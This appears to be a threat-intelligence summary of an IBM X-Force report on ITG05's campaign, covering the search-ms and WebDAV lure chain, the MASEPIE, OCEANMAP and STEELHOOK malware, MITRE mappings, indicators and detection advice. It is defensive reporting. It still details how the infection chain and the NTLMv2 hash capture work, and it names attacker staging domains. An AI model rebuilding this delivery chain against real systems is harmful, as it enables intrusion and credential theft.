Keypoints
- ITG05 staged payloads on public hosting (notably firstcloudit[.]com) and weaponized lure pages that present a blurred document and a “VIEW DOCUMENT” button to initiate the chain.
- The campaign abuses the Windows “search‑ms” protocol to prompt File Explorer to open remote Saved Search (*.search-ms) entries that reference malicious .LNK shortcuts on WebDAV servers.
- .LNK targets execute remote Python (or earlier PowerShell) payloads from actor‑controlled WebDAV open directories, running Client.py and related binaries to start the infection.
- MASEPIE is a Python backdoor that connects via raw TCP every ~50 seconds, sends “whoami” plus a 16‑byte key, uses AES‑128‑CBC encryption, and supports commands: check, send_file, get_file, or arbitrary command execution via os.popen().
- OCEANMAP is a .NET backdoor derived from CREDOMAP that persists via EdgeContext.url, uses IMAP for C2 (checks Drafts for name_id/newtime), executes shell commands, and supports in‑place binary patching for config changes.
- STEELHOOK is a lightweight PowerShell stealer (webhook‑based) that replaced credential‑stealing in CREDOMAP, and the campaign aims to capture NTLMv2 hashes for relay/offline cracking.
MITRE Techniques
- [T1105] Ingress Tool Transfer – WebDAV hosting used to stage and serve payloads (Python interpreter, Client.py, MASEPIE). Quote: ‘actor-controlled WebDAV server’ and ‘open directory of a WebDAV server used in multiple campaigns’.
- [T1204] User Execution – Victim must click “VIEW DOCUMENT”, which triggers JavaScript that opens a search‑ms URL and prompts File Explorer, initiating the infection. Quote: ‘A button prompts the user to view the document by clicking.’
- [T1218] Signed Binary Proxy Execution – Use of legitimate Windows components to invoke remote resources; observed process usage: rundll32.exe calling davclnt.dll to interact with WebDAV. Quote: ‘Process: rundll32.exe C:Windowssystem32davclnt.dll,DavSetCookie <malicious_URL>’.
- [T1059] Command and Scripting Interpreter – PowerShell and Python are used to execute payloads and run commands; .LNK files run Python or embedded PowerShell to start Client.py. Quote: ‘the malicious Python script (Client.py) is executed by the remote Python interpreter (python.exe)’.
- [T1573] Encrypted Channel – MASEPIE uses AES‑128‑CBC to encrypt C2 communications over raw TCP. Quote: ‘starts AES-128-CBC encrypted communication’.
- [T1071] Application Layer Protocol – OCEANMAP uses IMAP mailboxes for C2 check-in and command delivery (checks Drafts for name_id). Quote: ‘OCEANMAP checks the inbox once every minute’ and ‘searches for emails in the “Drafts” mailbox containing its “name_id” string in the subject’.
- [T1003] Credential Dumping / Use of Credential Material – Campaign objectives include exfiltrating NTLMv2 hashes for offline cracking or relay attacks, leveraging forced authentication techniques. Quote: ‘exfiltration of NTLMv2 hashes for offline cracking or NTLM relay attacks’.
Indicators of Compromise
- [Domain] staging/hosting – firstcloudit[.]com (used to stage payloads and short‑lived subdomains), webhook[.]site (used for webhooks/interaction tracking).
- [Files / Filenames] malicious artifacts – EdgeContext.url (persistence for OCEANMAP), Client.py (remote Python payload), and malicious .LNK shortcuts referenced by *.search-ms files.
- [Network strings / Traffic] MASEPIE TCP marker – raw TCP traffic containing the string ‘<SEPARATOR>’ as an indicator of MASEPIE communications; IMAP payload indicator ‘newtime1:0000…000’ used by OCEANMAP.
- [Open directories / Hosting] WebDAV server content – actor-controlled WebDAV open directories serving python.exe and payloads (observed accessible directories and file listings).
- [Webhook/OOB domains] callback/tracking services – examples observed: *.webhook[.]site, *.oast[.]fun (and other oast.* domains listed) used to track lure visits and clicks.
The technical infection chain begins with weaponized lure pages that show a blurred document and a “VIEW DOCUMENT” button; embedded JavaScript triggers a “search‑ms” URL that queries an actor‑controlled WebDAV server. When the user accepts the File Explorer prompt, the remote Saved Search (*.search‑ms) returns an .LNK file pointing to a relative path on the WebDAV server; opening that .LNK executes a remote interpreter (historically PowerShell, later a Python executable) which runs Client.py and launches the payload while also opening the decoy PDF in Edge.
Payload staging relies on public hosting (notably firstcloudit[.]com) and WebDAV open directories; MASEPIE (Python) acts as the first‑stage backdoor connecting over raw TCP every ~50 seconds, sending the “whoami” result with a 16‑byte key and using AES‑128‑CBC for encrypted C2. MASEPIE supports ‘check’, ‘send_file’, ‘get_file’, and arbitrary command execution via os.popen(), while OCEANMAP (a .NET successor to CREDOMAP) persists via EdgeContext.url, uses IMAP (Drafts inbox searches for name_id/newtime) as its C2 channel, and executes received commands (can patch its binary to change config). STEELHOOK is a compact PowerShell stealer delivering browser data via webhooks and replaces earlier stealing functionality.
Operational details useful for detection: monitor for short‑lived firstcloudit subdomains and WebDAV activity, .search‑ms files invoking remote .LNKs, .LNK files that spawn remote Python executables or PowerShell, suspicious raw TCP flows containing ‘<SEPARATOR>’, IMAP traffic to unknown servers (and the long ‘newtime1:000…000’ pattern), and webhook/OOB domains (webhook[.]site, oast.*). Infrastructure analysis also noted TLS CNs suggesting hosting on compromised Ubiquiti devices and heavy use of webhooks (Interact.sh/webhook[.]site) to track interactions.
Read more: https://securityintelligence.com/x-force/itg05-leverages-malware-arsenal/